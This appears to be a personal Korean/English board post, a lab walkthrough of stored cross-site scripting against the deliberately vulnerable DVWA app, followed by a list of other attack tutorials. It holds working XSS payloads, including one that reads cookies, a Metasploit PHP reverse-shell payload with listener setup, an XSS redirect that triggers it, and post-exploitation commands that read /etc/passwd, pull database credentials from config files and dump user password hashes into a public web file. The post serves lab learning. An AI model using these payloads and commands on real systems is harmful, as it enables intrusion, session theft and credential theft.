본문 바로가기
조회 수 5655 추천 수 0 댓글 0
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files
?

단축키

Prev이전 문서

Next다음 문서

+ - Up Down Comment Print Files

1. XSS Stored Basic Exploit Test

55.png
Name: Test 1
Message: <script>alert("This is a XSS Test")</script>

View Test 1 Results
56.png
Note: Every Time a user comes to this forum, this XSS exploit will be displayed.
Note: This exploit can be easily modified to capture cookie/session information for future Man-in-Middle attacks.

Reset DB
57.png

2. XSS Stored IFRAME Exploit Test
58.png
Name: Test 2
Message: <iframe src="http://www.cnn.com"></iframe>

View Test 2 Results
59.png
Note: This is a powerful exploit because a user could use SET to create Malicious cloned website and place in here.

Reset DB
57.png

3. XSS Stored COOKIE Exploit Test
60.png
Name: Test 3
Message: <script>alert(document.cookie)</script>

View Cookie
61.png
Note: An attacker could easily modify this XSS script to send the cookie to a remote location instead of displaying it.
Note: 원격에서 cookie를 받아서 공격자는 MITM 공격을 할 수 있다. victim으로 가장하여 해당 사이트에 접속, 해당 victim의 정보에 접근가능

Reset DB
57.png

7. XSS Stored window.location Exploit Test

1) Build PHP msfpayload from kali
mkdir -p /root/backdoor
cd /root/backdoor
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.122.148 LPORT=4444 R > FORUM_BUG.php
ls -l FORUM_BUG.php
vi FORUM_BUG.php <-------------- <?php의 주석을 제거

2) Upload PHP Payload
62.png

3) Start PHP Payload Listener from kali
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.122.148
set LPORT 4444
exploit

4) XSS Stored window.location Exploit
: 위에서 저장한 FORUM_BUG.php을 불러오는 js를 입력

63.png
Name: Test 4
Message: <script>window.location="http://192.168.122.179/dvwa/hackable/uploads/FORUM_BUG.php" </script>

5) access from victim

6) View Metasploit Session
from Meterpreter:
shell
tail /etc/passwd
whoami
grep apache /etc/passwd
find /var/www/* -print | grep config
grep "db_" /var/www/html/dvwa/config/config.inc.php
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "<pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- The <pre> is used as a pre-formatter
echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html <--------- 이제 이 페이지에 접근시 위 DB에서 가져온 정보를 볼 수 있다

Title
List of Articles
번호 제목 글쓴이 날짜 조회 수
46 How to install Xplico on Kali Hojung 2014.09.29 6808
45 MITM: Ettercap (automated arp spoof) + Xplico (pcap analyzer) file Hojung 2014.09.29 6662
44 DVWA - Upload and use C99.php Backdoor shell (upload C99.php and activate) file Hojung 2014.10.04 6325
43 DoS (Denial of Service) 공격에 대해 (Ping of Death, Syn Flooding 공격/탐지/대응, Tear Drop, Smurf/Fraggle, LAND Attack) file Hojung 2014.11.02 5923
» DVWA - Stored XSS (Cross Site Scripting) file Hojung 2014.10.04 5655
41 DVWA - Burp Suite, Man-in-the-middle-attack (burp 사용해 cookie를 확보 후 firefox에서 cookie 조작) file Hojung 2014.10.04 5462
40 DVWA - Automated SQL Injection with SqlMap (SQLi에 사용되는 URL 및 Cookie를 가지고 자동으로 injectin) file Hojung 2014.10.04 5428
39 Cracking password protected zip files with John on OSX Hojung 2014.08.23 5406
38 Session Cookie 세부항목에 대해 (secure, Http Only flag) Hojung 2015.01.06 5354
37 DVWA - Using the nikto.pl web vulnerability scanner file Hojung 2014.10.04 5173
36 DNS Spoofing from CLI (ip forwarding + arp spoofing + dns spoofing with ettercap) file Hojung 2014.10.06 5048
35 쉘코드(shell code)란 payload로 사용되는 작은 코드조각 Hojung 2014.12.23 4798
34 DHCP starvation attack by Yersinia file Hojung 2014.09.27 4522
33 Install WebGoat 5.3 in Kali file Hojung 2015.02.02 4261
32 brute-force HTTP/S basic access authentication with hydra file Hojung 2015.01.07 4231
31 Slowloris attack Hojung 2014.08.20 4125
30 DVWA - Upload PHP Backdoor Payload (PHP파일 업로드 후 web을 통해 액세스. 즉, 서버에서 php 실행됨) file Hojung 2014.10.04 4101
29 How To Install Metasploit Framework In MacOSX (homebrew, postgres) Hojung 2014.08.28 4046
28 DVWA - Manual SQL Injection and John the Ripper with sql result file Hojung 2014.10.04 4014
27 DVWA - Using Metasploit with Command Execution (backdoor using nc and access from Metasploit) file Hojung 2014.10.04 3876
Board Pagination ‹ Prev 1 2 ... 3 Next ›
/ 3

Designed by sketchbooks.co.kr / sketchbook5 board skin

나눔글꼴 설치 안내


이 PC에는 나눔글꼴이 설치되어 있지 않습니다.

이 사이트를 나눔글꼴로 보기 위해서는
나눔글꼴을 설치해야 합니다.

설치 취소

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5

Sketchbook5, 스케치북5